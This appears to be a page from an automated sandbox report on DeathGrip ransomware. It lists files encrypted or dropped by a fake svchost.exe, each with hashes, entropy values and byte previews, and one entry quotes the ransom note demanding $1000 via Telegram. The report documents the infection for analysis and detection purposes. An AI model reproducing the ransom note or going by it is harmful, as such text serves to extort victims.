                                                          C:\Users\jones\AppData\Local\Diagnostics\1612347604\2023100507.000\results.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Diagnostics\1612347604\2023100507.000\results.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):768
                                                          Entropy (8bit):7.344643263971878
                                                          Encrypted:false
                                                          SSDEEP:12:7xCf44EKQJ1Kb1wX69Lk3AXpuqyZSON69hWoeQGmSuHkxW3pbBPagS1:5DJ0wqC30w7Ez9wPQcuH2W3pdCb1
                                                          MD5:FA2B505F8A46C0CC541F22DD97A43E8C
                                                          SHA1:1276D94C2E6A6546505DF54D9F1023D662475082
                                                          SHA-256:9A753216BE5A16EA2EFB161D8BDDF8941BDF7A63D528F2E4C6ABB57E72C3BCF0
                                                          SHA-512:CF408A0D40B968E9A6D7BE1A61C2D63714EDBFE523C8475F18EECA7E9BAD7E13E9755D4433FAED9629B6EED9B6F15D2D402E8668B161AC0BC6AE0FEF5E2C0B03
                                                          Malicious:false
                                                          Preview:.............x,..J..7.7..x..q|.on.@c..O...@.i.."S..i.'J.e.o...E.."a.S..-....3.Z.....dg.MdF.`...3......@...im.V..o......nO...q.x.[..{...A.0.y.........E.R:I..o...W...XsXXb&.1.Z.....l".My.vw........N...\.:..}.......K..q..Hi..T.........j....)..ek.m.X...j.1.G.....#%.(.K.W.w..@ut.6<#3B..N]&......=g4O.@.h".X0.....vKp.RA...l..m.....0.%."3../....}m:..<..QQ?.w..).|....6C..1......6.CdVp..H....B.-D/.i..A.VJ.4.jndsfPtBFlpyyAgBoRLe1d5IYQxSN3OMYESPs2q4/r5sai7h70a5IZmDgneKPvXLLvclNkC7K+9h520bmfOGocv3kaw6LziP9Rrre28Ud1PWt575G+QrNgj/EdagUdhpwXFtaQYWFiVdud+CYo54UbkRBFyTnnUwuTGTrwyVs7Y/NwTPrrvRVeVuEPEaQN0+KVyltqQWK8Iu2FF6Bo5ZYmkBeEpY6XeoEGUgFYNR2mgopifHNkaPI8SjPg8cJVbW+/3A937giCnpX3EkHM0vdCg3GH8gLkHhBr+1secXCQ25V6tUZhPQraiyhXbZ0yEfw5zfwVf6DuR92tztlPpSVw==

                                                          C:\Users\jones\AppData\Local\Diagnostics\1612347604\2023100507.000\results.xsl

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Diagnostics\1612347604\2023100507.000\results.xsl.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):49312
                                                          Entropy (8bit):7.996307231673809
                                                          Encrypted:true
                                                          SSDEEP:1536:OTAKUMC0cFQbeepjYPgBjTrr9fUE2RRdspfifzleoHu:Y+mHbeepjYPgBjTdGPQifO
                                                          MD5:13F6F525BD1CBA79F3A6CB7FC988DA28
                                                          SHA1:9CDBB062F280D6E2614BE852404506987885A6C1
                                                          SHA-256:91F791C51CA65AB0FFB9F83A8C27CE8B1F125FDB87552656D75AA488CA6D1C86
                                                          SHA-512:4128018A8F58E42D18D82C0DEE825C46C596CDF7386D787D90F89CDB021A7A7F8C3794A55EFA6CF72D604ED1BA6E4B497F403DC0FD1C6ED08F2A990C231C500B
                                                          Malicious:true
                                                          Preview:.........4:...vrw,..U.......GH....V.J=..U.T.N.X.L>....B.s..U0'g.y6....n...M..EA....;...C.....Aq#eP..#...b)<f3a@...l.!c.`....0....s...Z....B..?y.$..o .....[...t....Q.C.....x...Y#E..X..sa..+....g4...H..(..=i.!5.&.d..........].....o.e..*.6}.n..lgg....<.?I.L.h...If......P9p...2..%..y......i#.....w(.J..#..=.\&cG.b.>/b.h.L....AC...]...8u)..;."U'.rI.....&..&^6.....4I=.Z...0+....fg....JQ ..o.4....y...#..ds.....g....~.....+1,q&....h:7C...u..>..c.\.1....S/..M.U}Y.\.p...)..E~A3`.F.~.<].Y9!.r.......{..jb6v...@.......-...@..g...z.9:..:~......Q.0...W1.%.E...of.&.01..v...|.F...:#V@.MrV...Q..Y..s..lt.K..|.~..VP.g'..a..a%Y.t8..N...F(...bx'..*Az....T..{...c..F...d.4 ..V...........Q..G.R.u.i .0....~...H%..^@...^.T../ q..TR.f....}.~.C.p.^./.-..q..n....w"...[?...]....aj......g.q..=a#.F}.l.(.....r.....>.T....0..Q._...:=..>.uR..L.~#.!.*v..P...Dl$.=z[.3...H..?..rV}...}.......8...u....F..3..:...[.u...3.5...Y....3q........'J&.W ..S..THrz.;.z@...VD..lR..

                                                          C:\Users\jones\AppData\Local\Diagnostics\1612347604\latest.cab

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Diagnostics\1612347604\latest.cab.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):11616
                                                          Entropy (8bit):7.983218804361249
                                                          Encrypted:false
                                                          SSDEEP:192:HQh8hEkReDSxYDHssxcf6LyBtv+lT3BNQ8XDL8UErc9vAoKXWsefdLzgec4mQjf9:wGDR0LDJHLyHM3E8XDLLkcKJGlXgISeR
                                                          MD5:B61952991B3A496C770819280D947D87
                                                          SHA1:57974887550D7CFA7BBBCC4338701AFE758D2618
                                                          SHA-256:B59C1B5BBBDE549336F6003B608F3BC74F946FA87B8E738DBAC8B02F017E27F1
                                                          SHA-512:0D241D6E4F707C997E4A4E4B2CCCCBD40F77F86C44739D84107318C7B009B2C2A75C32DFC3BAF0A1884411DE3947BEA8A920425D27E941700628B0C57FD64D1D
                                                          Malicious:false
                                                          Preview:.........:....>..aka.R@.._%.............1.9.(2R.......iS3...)......?F..7...S[...t........W...-..0+".....w........CW..7..dv.....,zDf^......P..'..s&.^..*1.9.".$4..c..oxd......?{.....D._I.o...'M:.#.....L.4....E...!y....&....Qt.....V.J.j=......f..7wZ..-.._.U.xx..),*.H.,..';E.u.o..X.B..?`.Y.2.W...&&.M..W. B...T. ...(?...o..DQ...;..Y...b..)J...3......F......K.{.G.k*X........M..@....!...M...S..5..T.O..d....1Q}.mQ\5[g..j..yk..\_x.5.:....`..i..'....#!#(M..M.../...O..#.hYF.....N..}..<..`#k/....N.$r`e.7......l.D.+7..a..=P.....A..,.=5........R.........<7.g.t.d...0bc...V(?z..N........TP.X.a.">....-.....6.0U.B........z:......8.....B...g.i. t...+...u....R....\1x-..H3......$....R.....+.V......j..hi{.M...&.#....lFf.k.1.9...!.0..\.9.F...5.J.e..$.._..F...{...s.....L..q.V...f..h..r.6.6.e...aB1.('O1..1.."......^q...H.....PT......h.{..yy.........w.d...qDm..Z..^h..F....~q.A.Y.a.0.d..Q@?}...;..zQ%..>..n..p..)/...F~{..1..-l./.A.2A.\...H..+F..

                                                          C:\Users\jones\AppData\Local\Diagnostics\1612347604\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):400
                                                          Entropy (8bit):6.357762592622856
                                                          Encrypted:false
                                                          SSDEEP:6:tn+j2LOG+ZkEgD58AU0JLxje+iKGl0UHQwuOf59EatIArvsHG1sOgydml4aI6n:tn+CLOJKEgFUA1KtKGuUHJ59EGI+wul6
                                                          MD5:2C06FBE48FC3DD5871F39B5D28B71875
                                                          SHA1:DE097865811D5FAA578EA52A69B3B01AA6618558
                                                          SHA-256:9A85BC7DE6C5DBF3B89034361C20ABC388AE81AE3547D9C8390C381EE68AD0B8
                                                          SHA-512:BAB77153D40AB416026C8183490126C7EBD32FF81FBC54682E2DE7E5E0406166F4DA8476CB7E96D6835BDFDF41B182CF2152EA94ED911364284ECC4C1D9B6872
                                                          Malicious:false
                                                          Preview:..........2C..........C...z...1.k....A...x.)&>..G....okUEiOBbGE8EaLfbSxv9Uy5kzSPJfjatI6sV40Wl6fw0ZWHKPNHYAG56tTId/RTagGOgaiFbFpRNMAlmdflzHdpmbtjLiV6gVPgdWVPD6CUWRf+kW/G3APb9F25km7Vq8l63iYB09PMrMdd7UWOBftQTMvgkUAwQ6KeXCiCrJQqpM2/E+z3PAf5A83U5S5NlgKN3NK7ijG79mGeN3XBazWgGcLGEi71wLCx92ruNvvJL7mOxW1PODOT01T70sOqf9Xm7IDDIH5wkDAIePEfPBIBbQr1SuJr2a++OvOMs76A/Pjh18nXA11chtYFq4lyoTwxlSl+e84vP31lCnT/6nQ==

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\000003.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.log.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):880
                                                          Entropy (8bit):7.5058595999347295
                                                          Encrypted:false
                                                          SSDEEP:24:yAubM1HH+ntpN67opI5/trEu+xFxUJdEnKdr3IIIea1:yANdwy5pg6JdTN4Jb
                                                          MD5:FEFCA8CBE8C6F68D1681D58A95EA6F13
                                                          SHA1:03D9CB386072B16E058B84A506BBA480DA9885C7
                                                          SHA-256:4243AF384C4197481A95907DB17B6CDB3CE51FFBF25BD138DBF99F83FB0F75DD
                                                          SHA-512:4EF5F49A50863C0DA0FEEFE3C735E656448F96B6DC41A995CB301CC01591465E332AC0069D7032AEBF86B53F4209D9993DD5F971567759C03A55CA09B5EA9086
                                                          Malicious:false
                                                          Preview:.........b.p.\..*+#..D$..L..q..,....r...*.3.....n.].s..I.......fZ.4......>...,.\......h.I..0..8.H..m.]...YJ.W ..J........\...y.*v!.?.;H../@k..i..z.Y..!.~...&.E...?......k&.u$.b.y.f..*......\d...n..b?.w...x3..zl.o..8.V...d+...P.:S....&t.fW.....p>..'.b[....I....s.uHj.3LI..T3..Ki..n._. .._.u$!H*.G...g..=S.]...... $Ex/.fA....<)..1.3K.GP.O .h......b<..|S.V.......S.. I..}..Fx..K...e..h*..'.....vz<...mf.~.g#.......>...C.H.E[.}..4../......n]...:*.r..!+.y$. .|....%.).......n.Z7@.q_...f...iQ............&e.r..q..<JxXNao/K03BH1Ki6IHmyYJFsbrpEV5MHo5Vmmhkqd2bppMoqEw0xzz1vqFi2iCzlh3Taq00fmqBXYJNLPs0n1lPV/gObHP5pmyMuBqF034Xf6T0MJQlItfIegglGJP2TGn57ruaGpNOcwEa+yb8PCTqPKTLddUnLiBzGnsn9+zA+O6t6vKWHQjLaAkAOJKWRxQMNGvhKda/e468v/Cw2p1K7Dfztq3DXxu3vY7Zu9mPeUXiIzhs/hJ/rTGPixX+zoSsR6gkTeAW9wC/qbOKDTbVab2EyM2XjZ3Ks4vBuuka3s1j/rt4z3hfwvZMqCg6ujMg8gvCHlOiLMQE3xgdZlQ==

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000003.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000003.log.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):400
                                                          Entropy (8bit):6.340516003804926
                                                          Encrypted:false
                                                          SSDEEP:12:u4+MDUiRZXlemKSJVhsSshWSUatuE9MMO/ckLRWdEYIynHh:uwDUiRveSJQftUatuuM3RLg0i
                                                          MD5:1ED7BC2B5BE0257AE1A2988AF565C44D
                                                          SHA1:9EA6EF36268ACD16D1DF7A2C51DE0CD6DDB5EDDF
                                                          SHA-256:0BC067232ADA25E067BB546099BC319E296CBA9DCF18C56BC00F0FBC80475E88
                                                          SHA-512:BC074B047029E1FA79B7D442DBFBE4CD07F670D243447DB142CB01E523B1079BFDCEE7D946C6A6A41BA46D2991F04E7411991B4C88859255A732CBB264256C4D
                                                          Malicious:false
                                                          Preview:...........>.UyP..@!k.'..^...F..k.....F...;`%L..-....FoVlnKKGme7dANfjavGjJ5kgrQ8m/oPunMrgehYdKiNnfORYapcHdGTSUYRbuT4bhhVUIeJATBCAD+yoWp6Yd5FDOSZyQ1IqR9mrGgzFr06Tdr95tw4wIZdhzFfdFYz5xiujqIXeUBeS36DI6HYg/d9gSLWMOxK+/GJFeQM5ynu+tFNeb+eQtfgaaKbLJnIejjBwiGtq5aHLH0Xt02kQwcbJGKoioqfRy5MEV2d025z5ZjpVZxkWCsLlI0BACTrrAWeBu8bSaA2naJB+uKo8YmMDMSYPBZcMwKKBTSWjkwL021udJ0UQ87NaUr5ii+yn+MZHtQR8cpfWXfzJHQwSsA==

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):368
                                                          Entropy (8bit):6.076333348243556
                                                          Encrypted:false
                                                          SSDEEP:6:yr1mcN/cc9BrmcJid9C5z/ZhEhPo3+UtfDwxhs8tfKL8iQgPoL9pEpaT3UqxC1iT:yrPN1BycJ0yhEhPo36xhsqfILQgPSpSa
                                                          MD5:8CF823B7CAC940468C3C3DDAB7BB35CF
                                                          SHA1:0020CAC368384E43743E499593BD6181DA857EEE
                                                          SHA-256:DF4364FFAB73F5DDD6AE03FAA405C611F530ED6EC4D54D8D69328798FB21E7EA
                                                          SHA-512:AB99276C09F78175CCF37325E2E86801FC00DD267E21D9475A58B6103884DFE7AED5CF161F5322154A748CABF4BEC6AB0B3299F585CBE3A7893F3286C3CA2BD6
                                                          Malicious:false
                                                          Preview:.........Q.x.5..`I+..%..OBbz+4D951cMwTRz+B1INgj4wL8j8SjxJHcBSnydoP9IVrissVxP+5fhzwUm1cQM2yqROHrpLpGUXjDWQJA+aQ/NHhkI6M5RaUm3lvCtZbOm78ebBEmH1LYw3dDVXPJG76zKdhD4IoLffj4kRW3/nMyCyUgroTeijlRm4v57+EwE3TU7iOmIVHZu7zxHmtzljugoC99GPzRJ2JmqSvPop2Db5BOQhsPETbkv/MpP9ouRxkUTiyOM+Q+rgz+mxk41NjqHjh5iDjGrjjou9iXXBjKmpF2ZyF6lL14g9N0ob5xgovRZVgXmesbmf9d/JWTv+ZXYzQXyigivLE6QzWCUSQ==

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\000003.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\000003.log.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):416
                                                          Entropy (8bit):6.421967076053681
                                                          Encrypted:false
                                                          SSDEEP:6:EfWTXph8pDnJTn7dJ+gutCNmcRzRY+wD0lY8TViaFIyqSJQYWvz0KMTV3PUzw:8JTnJBBNmEYPV8TwaFIJSXWv7Vzw
                                                          MD5:BDFE05D486352DA4200704D5BCE2AA01
                                                          SHA1:B80F35A816808B116BD1C9A092DE6FFFC40FBA31
                                                          SHA-256:7099BC7EA1D33E095C3A9A358B999922ED3F7C5F815896C440AF2DBA58DDBA54
                                                          SHA-512:9E9B544A15F3A7ED0D32547625F1883A4EB85D720A1FE6A5F80FFE21CAD0256C5E0C253AB1D3DE91D800E05D8B0B1F1FCF60B11349531543B2AD8DB9A25EFD0A
                                                          Malicious:false
                                                          Preview:.........-.m.....f*.M..;.......N..'.x...%E...o...m...~Yz.1-7f.R....DDF75+m73aBLxIC9X5aFgEivB+1844uco4wA8qVPnz5MKEIScWE5qSqt8qRITG39Hn/eTCJ/F+tX7adq1lTcXBm5nlsaLkvICmKv3hAFsujv/Ewf2iuV580RrBDot2qSPE5WFW2LH5RcJexLRgHVt/QlY2dfClDfCNE22znQOcA7AtxhtYN47s/sVUEFjrhAJWJf16AyVkQScmXm7ks7rAoGwYwmPV7LNaeyvRqmIIgmGs3ExTJcAVBo0mL0kpFEWmHf90dhFP+IImWwbfPiIfVt4NQbxn5iHjgJmeRlI6rpiHwFXgfy1wvORRynJ7G14Sdj7zzjqpoBuowlirIrqUA==

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2784
                                                          Entropy (8bit):7.909054892204252
                                                          Encrypted:false
                                                          SSDEEP:48:8Fcl32gb7coUdWFWDmz5Aq6sKmQQDtj41H1G0xR/TdS+oe9nXwkX:CcJNbz0WFWDoGsK2E1Y2BTdZ9nXx
                                                          MD5:AFED19F8032CD3FA32A791643E779065
                                                          SHA1:1A22B003DCAE07FF542EC86A8A64AB2164B7ED87
                                                          SHA-256:4864BBE2431F9F76E0C4455092550791DEDF933B73472D1792327CC3AFC67EDE
                                                          SHA-512:5519F2755CEA30886B13B464FA1CE51F3218ACEE05381390CD9388D6904926325A5F560434F94C8EF9377C1074FD66DCF42D5B20845ED8C1633DF67286E30217
                                                          Malicious:false
                                                          Preview:........Uf:....c..p[t..u.m....0I3.H< Z.Z.?P.:..r.jhi32.5..1.kz....iR.,.8<(_'.....z6.R..O...#....a...+.z<..G.#.h.5.?h.n.....}..<.....C.....K......u5.f2.P....Y.%.....,A.[N..G..Z.j.?.......H-0.\.w.....p...d.l...d.V.....q..n./...w..O...+.C../KI<J2....h...m.....`....b.i..X.....8.(.1.5.+.'puG..^.....(....'..z...>..m..@pR.+...m..2Y#....M..`...o.=./.9.H..V.=.5...0....I....<.vO7.&.gN..i.J.....a8.`3@69.....Woe.>....r..%.-..+.....:.;.^.u.}..'u.x.Y{)....;<....P..Y..yc4......./i.,.FTG..Y....o7i.J...K..-....w..s.'..%...A?.E..h..I.....r<.5....$..l.y..5\..i.>b.M....dw.K...u.,t....9.....[..HP!B..... '......z6.6&ps..1E....B..F...'...b.7..?...sFgwpu.....V....I........{f..j+.6....=..Xv....q.9%k.;.....&...ZE..w...~...h..EJ3.=..E..L.i(..Ph.T]5.`..h...NR.p$;.#."..D.P\..)u.'..@..K.[..s...E._.V...5Z..&D..pYW....Rm...'.B...Bu.-..!m..N0._...(.i..~.8~.. .:.6.....X.Dn.s..';.m..H.df(v`-.w.f.3...CG..\.=..4.....r....`.$-U..-.x.. .}..0.g?...D$..=L. n4.^?.2....|?5..L.G...

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\128.png

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

